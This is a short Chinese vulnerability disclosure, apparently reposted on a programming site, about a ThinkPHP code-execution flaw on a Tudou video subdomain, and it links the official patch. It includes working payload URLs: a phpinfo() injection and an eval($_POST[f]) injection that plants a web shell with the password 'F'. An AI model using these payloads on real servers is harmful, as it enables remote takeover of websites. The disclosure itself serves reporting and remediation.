土豆分站任意代码执行,同服务器上有好几个活动页面 详细说明: 用的phpthink框架 存在命令执行 漏洞 http://a.tudou测试数据/specapp/index.php/module/action/param1/${@phpinfo()} 直接拿shell : http://a.tudou测试数据/specapp/index.php/module/action/param1/${@eval%28$_POST[f]%29} 密码:F 漏洞证明: http://a.tudou测试数据/specapp/index.php/module/action/param1/${@phpinfo()} 自己打开看 修复方案: 官方补丁:http://code.google测试数据/p/thinkphp/source/detail?spec=svn2904&r=2838 作者Finger
查看更多关于土豆分站使用phpthink框架含任意代码执行 - 网站的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11984